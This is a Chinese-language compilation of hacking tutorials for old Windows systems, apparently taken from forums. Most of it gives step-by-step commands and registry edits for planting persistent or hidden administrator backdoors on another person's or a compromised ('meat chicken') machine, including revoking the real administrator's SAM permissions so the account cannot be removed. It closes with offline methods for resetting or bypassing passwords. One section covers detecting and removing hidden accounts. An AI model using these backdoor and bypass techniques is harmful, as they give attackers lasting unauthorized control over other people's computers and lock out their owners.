一.建立一個別人永遠刪不掉的管理員用戶

　　操作步驟：

　　1、在自己電腦里面建立一個.txt文本文件.

　　2、在里面輸入內容

　　@echo off

　　net user yixiao 123456 /add 注釋：前面yixiao是用戶名后面123456是密碼;

　　net localgroup administrators yixiao /add

　　3、把這個文件保存，更改后綴為yixiao.bat 注釋：前面名字隨便，后面格式一定要是bat;

　　4、把這個文件拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目錄下，沒有的話自己創建。

　　完成，下次對方電腦無論如何都有這個管理員帳號，刪除了，下次啟動還有!

　　如果把里面的內容改成

　　@echo off

　　net user administrator 123456 /add

　　意思是不管你怎么改，下次啟動管理員帳號administrator密碼一直是123456。

　　二.俺認為上述的方法并不理想，可以用隱藏帳號方法來建帳號會更好 。

　　操作步驟：

　　1、首先建立一個帳號結尾要帶$號 ,如果yixiao$ ， 密碼自己隨便，然后把帳號刪除.

　　2、將以下代碼保存成(.reg)注冊表形式

　　代碼如下：

　　-------------------------------------------------------------------------------

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\

　　names\yixiao$]

　　@=hex(1f4):

　　-------------------------------------------------------------------------------

　　說明：1f4是Administrator帳號十六進制的值

　　3、保存好后導入 ，然后用CMD命令設置密碼

　　net user yixiao$ 123456

　　這樣一個隱形帳號就建立好了，用戶在“本地用戶和組”內根本無法看到這個帳號。所以也不存在刪除帳號。記得千萬別在同事的電腦上搗鼓哦，如果被查出來。。。。。嘿嘿:-)

　　隱藏管理員帳號三分鐘搞定

　　對 regedit.exe我想大家都很熟悉，但卻不能對注冊表的項鍵設置權限，而regedt32.exe最大的優點就是能夠對注冊表的項鍵設置權限。 nt/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\\SAM\\SAM鍵下，但是除了系統用戶SYSTEM外，其它用戶 都無權查看到里面的信息，因此我首先用regedt32.exe對SAM鍵為我設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進行讀寫了了。具體 步聚如下：

　　1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的，首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶 net user hacker$ 1234 /add

　　2、在開始/運行中輸入:regedt32.exe并回車來運行regedt32.exe。

　　3、點“權限”以后會彈出窗口點添加將我登錄時的帳戶添加到安全欄內，這里我是以administrator的身份登錄的，所以我就將 administrator加入，并設置權限為“完全控制"。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組，切莫修改原有的帳戶或組，否則將 會帶來一系列不必要的問題。等隱藏超級用戶建好以，再來這里將你添加的帳戶刪除即可。

　　4、再點“開始”→“運行”并輸 入"regedit.exe" 回車,啟動注冊表編輯器regedit.exe。 打開鍵：HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names \\hacker$"

　　5、將項hacker$、00000409、000001F4導出為hacker.reg、409.reg、 1f4.reg，用記事本分別打這幾個導出的文件進行編輯，將超級用戶對應的項000001F4下的鍵"F"的值復制，并覆蓋hacker$對應的項 00000409下的鍵"F"的值,然后再將00000409.reg與hacker.reg合并。

　　6、在命令行下執行net user hacker$ /del將用戶hacker$刪除：net user hacker$ /del

　　7、在regedit.exe的窗口內按F5刷新，然后打文件-導入注冊表文件將修改好的hacker.reg導入注冊表即可

　　8、到此，隱藏的超級用戶hacker$已經建好了，然后關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINE\\SAM\\SAM鍵權限改回原來的樣子(只要刪除添加的帳戶administrator即可)。

　　9、注意：隱藏的超級用戶建好后，在帳戶管理器看不到hacker$這個用戶，在命令行用“net user”命令也看不到，但是超級用戶建立以后，就不能再改密碼了，如果用net user命令來改hacker$的密碼的話，那么在帳戶管理器中將又會看這個隱藏的超級用戶了，而且不能刪除。

　　建立與刪除隱藏的管理員帳號

　　當黑客入侵一臺主機后，會想方設法保護自己的“勞動成果”，因此會在肉雞上留下種種后門來長時間得控制肉雞,其中使用最多的就是賬戶隱藏技術。在肉雞上 建立一個隱藏的賬戶，以備需要的時候使用。賬戶隱藏技術可謂是最隱蔽的后門，一般用戶很難發現系統中隱藏賬戶的存在，因此危害性很大，本文就對隱藏賬戶這 種黑客常用的技術進行揭密。

　　在隱藏系統賬戶之前，我們有必要先來了解一下如何才能查看系統中已經存在的賬戶。在系統中可以進入“命令 提示符”，控制面板的“計算機管理”，“注冊表”中對存在的賬戶進行查看，而管理員一般只在“命令提示符”和“計算機管理”中檢查是否有異常，因此如何讓 系統賬戶在這兩者中隱藏將是本文的重點。

　　一、“命令提示符”中的陰謀

　　其實，制作系統隱藏賬戶并不是十分高深的技術，利用我們平時經常用到的“命令提示符”就可以制作一個簡單的隱藏賬戶。

　　點擊“開始”→“運行”，輸入“CMD”運行“命令提示符”，輸入“net user piao$ 123456 /add”，回車，成功后會顯示“命令成功完成”。接著輸入“net localgroup administrators piao$ /add”回車，這樣我們就利用“命令提示符”成功得建立了一個用戶名為“piao$”，密碼為“123456”的簡單“隱藏賬戶”,并且把該隱藏賬戶提 升為了管理員權限。

　　我們來看看隱藏賬戶的建立是否成功。在“命令提示符”中輸入查看系統賬戶的命令“net user”，回車后會顯示當前系統中存在的賬戶。從返回的結果中我們可以看到剛才我們建立的“piao$”這個賬戶并不存在。接著讓我們進入控制面板的“ 管理工具”，打開其中的“計算機”，查看其中的“本地用戶和組”，在“用戶”一項中，我們建立的隱藏賬戶“piao$”暴露無疑。

　　可以總結得出的結論是：這種方法只能將賬戶在“命令提示符”中進行隱藏，而對于“計算機管理”則無能為力。因此這種隱藏賬戶的方法并不是很實用，只對那些粗心的管理員有效，是一種入門級的系統賬戶隱藏技術。

　　二、在“注冊表”中玩轉賬戶隱藏

　　從上文中我們可以看到用命令提示符隱藏賬戶的方法缺點很明顯，很容易暴露自己。那么有沒有可以在“命令提示符”和“計算機管理”中同時隱藏賬戶的技術呢?答案是肯定的，而這一切只需要我們在“注冊表”中進行一番小小的設置，就可以讓系統賬戶在兩者中完全蒸發。

　　1、峰回路轉，給管理員注冊表操作權限

　　在注冊表中對系統賬戶的鍵值進行操作，需要到“HKEY_LOCAL_MACHINE\SAM\SAM”處進行修改，但是當我們來到該處時，會發現無法 展開該處所在的鍵值。這是因為系統默認對系統管理員給予“寫入DAC”和“讀取控制”權限，沒有給予修改權限，因此我們沒有辦法對“SAM”項下的鍵值進 行查看和修改。不過我們可以借助系統中另一個“注冊表編輯器”給管理員賦予修改權限。

　　點擊“開始”→“運行”，輸入 “regedt32.exe”后回車，隨后會彈出另一個“注冊表編輯器”，和我們平時使用的“注冊表編輯器”不同的是它可以修改系統賬戶操作注冊表時的權 限(為便于理解，以下簡稱regedt32.exe)。在regedt32.exe中來到“HKEY_LOCAL_MACHINE\SAM\SAM”處， 點擊“安全”菜單→“權限”，在彈出的“SAM的權限”編輯窗口中選中“administrators”賬戶，在下方的權限設置處勾選“完全控制”，完成 后點擊“確定”即可。然后我們切換回“注冊表編輯器”，可以發現“HKEY_LOCAL_MACHINE\SAM\SAM”下面的鍵值都可以展開了。

　　提示：上文中提到的方法只適用于Windows NT/2000系統。在Windows XP系統中，對于權限的操作可以直接在注冊表中進行，方法為選中需要設置權限的項，點擊右鍵，選擇“權限”即可。

　　2、偷梁換柱，將隱藏賬戶替換為管理員

　　成功得到注冊表操作權限后，我們就可以正式開始隱藏賬戶的制作了。來到注冊表編輯器的“HKEY_LOCAL_MACHINE\SAM\SAM \Domains\Account\Users\Names”處，當前系統中所有存在的賬戶都會在這里顯示，當然包括我們的隱藏賬戶。點擊我們的隱藏賬戶 “piao$”，在右邊顯示的鍵值中的“類型”一項顯示為0x3e9，向上來到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains \Account\Users\”處，可以找到“000003E9”這一項，這兩者是相互對應的，隱藏賬戶“piao$”的所有信息都在 “000003E9”這一項中。同樣的，我們可以找到“administrator”賬戶所對應的項為“000001F4”。

　　將 “piao$”的鍵值導出為piao$.reg，同時將“000003E9”和“000001F4”項的F鍵值分別導出為 user.reg，admin.reg。用“記事本”打開admin.reg，將其中“F”值后面的內容復制下來，替換user.reg中的“F”值內 容，完成后保存。接下來進入“命令提示符”，輸入“net user piao$ /del”將我們建立的隱藏賬戶刪除。最后，將piao$.reg和user.reg導入注冊表，至此，隱藏賬戶制作完成。

　　3、過河拆橋，切斷刪除隱藏賬戶的途徑

　　雖然我們的隱藏賬戶已經在“命令提示符”和“計算機管理”中隱藏了，但是有經驗的系統管理員仍可能通過注冊表編輯器刪除我們的隱藏賬戶，那么如何才能讓我們的隱藏賬戶堅如磐石呢?

　　打開“regedt32.exe”，來到“HKEY_LOCAL_MACHINE\SAM\SAM”處，設置“SAM”項的權限，將 “administrators”所擁有的權限全部取消即可。當真正的管理員想對“HKEY_LOCAL_MACHINE\SAM\SAM”下面的項進行 操作的時候將會發生錯誤，而且無法通過“regedt32.exe”再次賦予權限。這樣沒有經驗的管理員即使發現了系統中的隱藏賬戶，也是無可奈何的。

　　三.專用工具，使賬戶隱藏一步到位

　　雖然按照上面的方法可以很好得隱藏賬戶，但是操作顯得比較麻煩，并不適合新手，而且對注冊表進行操作危險性太高，很容易造成系統崩潰。因此我們可以借助專門的賬戶隱藏工具來進行隱藏工作，使隱藏賬戶不再困難，只需要一個命令就可以搞定。

　　我們需要利用的這款工具名叫“HideAdmin”，下載下來后解壓到c盤。然后運行“命令提示符”，輸入“HideAdmin piao$ 123456”即可，如果顯示“Create a hiden Administrator piao$ Successed!”，則表示我們已經成功建立一個賬戶名為piao$，密碼為123456的隱藏賬戶。利用這款工具建立的賬戶隱藏效果和上文中修改注 冊表的效果是一樣的。

　　四、把“隱藏賬戶”請出系統

　　隱藏賬戶的危害可謂十分巨大。因此我們有必要在了解了賬戶隱藏技術后，再對相應的防范技術作一個了解，把隱藏賬戶徹底請出系統。

　　1、添加“$”符號型隱藏賬戶

　　對于這類隱藏賬戶的檢測比較簡單。一般黑客在利用這種方法建立完隱藏賬戶后，會把隱藏賬戶提升為管理員權限。那么我們只需要在“命令提示符”中輸入 “net localgroup administrators”就可以讓所有的隱藏賬戶現形。如果嫌麻煩，可以直接打開“計算機管理”進行查看，添加“$”符號的賬戶是無法在這里隱藏 的。

　　2、修改注冊表型隱藏賬戶

　　由于使用這種方法隱藏的賬戶是不會在“命令提示符”和“計算機管理”中看到的，因此可以到 注冊表中刪除隱藏賬戶。來到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”，把這 里存在的賬戶和“計算機管理”中存在的賬戶進行比較，多出來的賬戶就是隱藏賬戶了。想要刪除它也很簡單，直接刪除以隱藏賬戶命名的項即可。

　　3、無法看到名稱的隱藏賬戶

　　如果黑客制作了一個修改注冊表型隱藏賬戶，在此基礎上刪除了管理員對注冊表的操作權限。那么管理員是無法通過注冊表刪除隱藏賬戶的，甚至無法知道黑客建 立的隱藏賬戶名稱。不過世事沒有絕對，我們可以借助“組策略”的幫助，讓黑客無法通過隱藏賬戶登陸。點擊“開始”→“運行”，輸入 “gpedit.msc”運行“組策略”，依次展開“計算機配置”→“Windows 設置”→“安全設置”→“本地策略”→“審核策略”，雙擊右邊的“審核策略更改”，在彈出的設置窗口中勾選“成功”，然后點“確定”。對“審核登陸事件” 和“審核過程追蹤”進行相同的設置。

　　進行登陸審核后，可以對任何賬戶的登陸操作進行記錄，包括隱藏賬戶，這樣我們就可以通過“計算機管理”中 的“事件查看器”準確得知隱藏賬戶的名稱，甚至黑客登陸的時間。即使黑客將所有的登陸日志刪除，系統還會記錄是哪個賬戶刪除了系統日志，這樣黑客的隱藏賬 戶就暴露無疑了。

　　得知隱藏賬戶的名稱后就好辦了，但是我們仍然不能刪除這個隱藏賬戶，因為我們沒有權限。但是我們可以在“命令提示符”中輸入“net user 隱藏賬戶名稱 654321”更改這個隱藏賬戶的密碼。這樣這個隱藏賬戶就會失效，黑客無法再用這個隱藏賬戶登陸。

　　win2003下創建永遠的隱藏帳戶操作一、二

　　前段時間比較流行的一句話”肉機”其實要想控制遠端的計算機,那我想就少不了隱藏用戶帳號的問題了,其實創建隱藏用戶帳號還是比較簡單的，現在我就把創建隱藏用戶帳號告訴大家。

　　其實每一個用戶帳號在注冊表中都有自己帳號數據項

　　首先我們看看管理員在注冊表中的數據項是什么樣的

　　操作一、打開注冊表：HKEY_LOCAL_MACHINE\SAM\SAM

　　SAM是保存用戶帳號的地方，不過這個“項”在默認情況下是不可見的。我們如果想看內部的內容就必須首先對其授權。(建議對注冊表不是很熟悉的朋友不要隨便改動注冊表)

　　操作二、認識注冊表中的帳號分類

　　在OS中的用戶帳號無論是內置帳號，還是后建帳號，在注冊表中都能看見。不過有兩個帳號大家一定要能夠認識，那就是管理員帳號和guest帳號。

　　”000001fa4”表示的是管理員帳號，即使管理員帳號被重命名了這個值也是不會變的，所以我們可以通過這個值來判斷，重命名后的管理員帳號。

　　“000001fa5” 表示的是guest帳號，同樣這個值也不會因為，來賓帳號給重命名而改變。剩下的其 它值基本上就是后來創建的用戶帳號，生成值了。 認識了注冊表后，現在我們就來利用”net user”命令創建帳號了，創建隱藏帳號必須在CMD下。有關常見的命令，這些命令也可以在OS的幫助中找到。

　　操作三、利用”net user”命令創建帳號

　　一、先建立隱藏用戶 xbx$ 1、net user xbx$ 123,abc /add 這里的意思是說，建立個xbx$ 帳戶密碼是123,abc

　　1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 這里的意思是說把xbx,以便讓我們創建用戶具備管理員權限。

　　一、觀察注冊表中的變化，并對注冊表做相應的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

　　1、找到我們剛剛創建的用戶帳號

　　我們可以看見”000003f6”就是我們剛新建立的”xbx

　　2、在注冊表中多帳號權限復制

　　找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 這個項，打開”000001f4”項，然后再打開”F”。

　　然后將這里面的值，全選，粘帖并覆蓋到”000003f6”的”F”值.

　　3、導出注冊表值

　　現在將注冊表中的“000001f4”、“000003f6”和“xbx"都導入出來,可直接將Users所有鍵值都導出來,到文件.

　　4、刪除帳號

　　接下來我們再次進入“CMD”中刪除“xbx

　　刪除帳號后，則注冊表中的值也就沒有了，這個時候我們再把剛才導出的注冊表項，導入到注冊表中。 這個時候我們打開“本地計算機用戶和組”就看不見“xbx"

　　系統密碼破解方法總結

　　一、ERD2003

　　利用ERD2003強行修改系統管理員密碼的方法簡單、易于操作，且對2000/xp/2003系統均有效。下面就具體介紹一下這個軟件的用法。

　　1.下載ERD2003的iso，刻錄成可啟動的CD，注意別搞錯了，直接刻錄鏡像最好。

　　2.設置系統從光盤啟動，進入“系統”后，ERD2003會針對系統的網絡等硬件設備進行一些設置，總之遇到要你選擇時一概選“yes”即可。

　　3.接下來ERD2003會在你的硬盤里搜索所有已安裝的系統，再讓你選擇要修改的系統。

　　4.耐心等待，進入系統后：按start—administrative tools—locksmith，進入強行修改密碼的界面，隨后彈出的對話框會讓你選擇要修改密碼的用戶名，選擇后即可強行修改密碼而不用輸入原始密碼，然后點擊NEXT，之后重啟。

　　二、PASSWARE KIT 5.0中的Windows KEY 5.0

　　也有一些工具光盤里有這個程序，直接光盤運行就可以了。

　　如果找不到這種光盤，運行PASSWARE KIT 5.0后生成3個文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF，3個文件共50KB。

　　把這3個文件放在任何軟盤中，然后使用XP安裝光盤啟動電腦，啟動過程中按F6鍵讓系統采用第三方驅動程序。

　　此時，正是我們切入的最好時機，放入該軟盤就會自動跳到Windows KEY的界面。軟件會自動檢測系統中安裝的Windows 2000/XP/2003并列一個表供用戶選擇，當出現提示“Please enter your selection 1..? or 0 to quit:”(根據檢測到已安裝操作系統的數量，“?”可能是1到9之間的某個數字)時，按相應的數字鍵進行選擇。接著出現提示“Set local Administrator password to‘12345’?(Y/N):”，即問是否把“Administrator”的密碼修改為“12345”，按Y鍵，軟件首先自動備份原密碼，然后把 “Administrator”的密碼修改為“12345”。從光驅中取出光盤，重新啟動計算機，如果Windows XP歡迎界面中沒有列出“Administrator”用戶，那么就連續按兩次“Ctrl+Alt+Del”組合鍵，這時就會出現輸入用戶名和密碼的界 面，在“用戶名”中輸入“Administrator”，在“密碼”中輸入“12345”，單擊“確定”按鈕就可以登錄Windows XP了。

　　提示：第一次登錄Windows XP，系統會提示你密碼已到期，要不要進行修改。你可以根據需要自行選擇。

　　這 個方法還可以恢復原來的密碼 !!如果只是臨時使用系統，使用完Windows XP后還想恢復原來的“Administrator”的密碼，可按下面的方法操作。 先按照修改“Administrator”密碼的步驟一和步驟二進行操作，接著就會出現提示“Would you like to undo Windows XP/2000/NT Key changes?(Y/N):”，按Y鍵，軟件就會自動恢復原來的“Administrator”密碼，接著又出現提示“Set local Administrator password to ‘12345’?(Y/N):”，按N鍵，不要把“Administrator”的密碼修改為“12345”。從光驅中取出光盤，重新啟動計算機，就完成 了密碼恢復。

　　三、DreamPackPL

　　將下載回來的軟件DreamPackPL解壓縮到硬盤上一個方便的位置，然后運 行其中的DreamPack.exe文件，在軟件界面上選中放入Windows安裝光盤的光驅，然后點擊“Make ISO CD image”按鈕，程序將創建一個ISO格式的光盤鏡像，并需要你指定保存該鏡像文件的目錄。創建好后用光盤刻錄軟件將該鏡像文件刻錄到光盤中，然后使用 這張光盤引導電腦啟動。Windows的安裝程序將會自動運行，到某時按R鍵進入故障恢復控制臺。隨后安裝程序會自動顯示所有已經安裝的Windows操 作系統，使用數字鍵選擇你想要進入的操作系統的故障恢復控制臺，然后按下回車。當需要輸入管理員密碼的時候也不用擔心，我們并不知道密碼是什么，但是我們 要只要，直接按下回車就可以跳過這一步。隨后進入System32文件夾：cd system32，并把該目錄下的文件sfcfiles.dll重命名為其他名稱：ren sfcfiles.dll sfcfiles.lld。接著我們從光盤中I386目錄下復制文件pinball.ex_到System32文件夾中，并命名為 sfcfiles.dll：copy d:\i386\ pinball.ex_ sfcfiles.dll。至此前期工作已經全部做完了，把光盤拿出來，然后輸入exit命令退出控制臺，并重啟動電腦。以上所作的一切只是為了替換系統 中的sfcfiles.dll文件，因此如果你的操作系統安裝在FAT32文件系統的分區上，那就更簡單了，只要直接用Windows 98啟動盤引導電腦進入DOS，并在DOS下用DreamPackPL軟件壓縮包中的sfcfiles.dll文件替換System32目錄下的原同名文 件即可(注意不要忘了Windows的文件保護，備份文件也要替換)。

　　忘記了電腦中管理員帳戶的密碼。那么可以在重啟后顯示的界面上點擊“Details”按鈕，隨后可以看到和平常的帳戶管理界面類似界面，選中想要修改密碼的帳戶，然后點擊窗口下方的“重設密碼”按鈕，輸入新的密碼后點擊確定即可。

　　四、其他的方法

　　1.一個dos下破解密碼的軟件，DOSPASS。

　　2.直接用安裝盤啟動安裝界面時按Shift+F10，打開一個命令行窗口，用net user administrator 123 修改密碼為123，用SHIFT+F10打開CMD后運行SET不加參數可以看到密碼。

　　3. 使用OFFICE NT PASSWORD & REGISTRY EDITOR。用該軟件可以制作LINUX啟動盤，這個啟動盤可以訪問NTFS文件系統，因此可以很好地支持Windows 2000/XP。使用該軟盤中的一個運行在LINUX下的工具NTPASSWD就可以解決問題，并且可以讀取注冊表并重寫賬號。使用方法很簡單，只需根據 其啟動后的提示一步一步做就可以了。在此，建議你使用快速模式，這樣會列出用戶供你選擇修改那個用戶密碼。默認選擇ADMIN組用戶，自動找到把 ADMINISTRATOR的名字換掉的用戶，十分方便。

　　五、網上其他一些傳說中破解Windows2000/WindowsXP/Windows2003密碼的方法

　　1.進入DOS刪除sam文件——這種方法對win2000有效，對xp和2003不但無效，還會導致系統死鎖而徹底無法使用。

　　2.用winpe啟動進控制臺，然后用dos命令手動增添用戶——除非原來管理員密碼(指的是安全模式下的那個管理員)就沒有設置，否則無效。

　　3. 將屏幕保護改名，將cmd.exe改名為logon.scr(當然要掛在別的機器上改了)，開機后等待10分鐘進入屏幕保護，實際上就進入了 dos命令行界面，可以用net命令加用戶——已證明在sp1、sp2、2003中，這樣進入dos后的權限根本不是管理員，因此也無法添加用戶。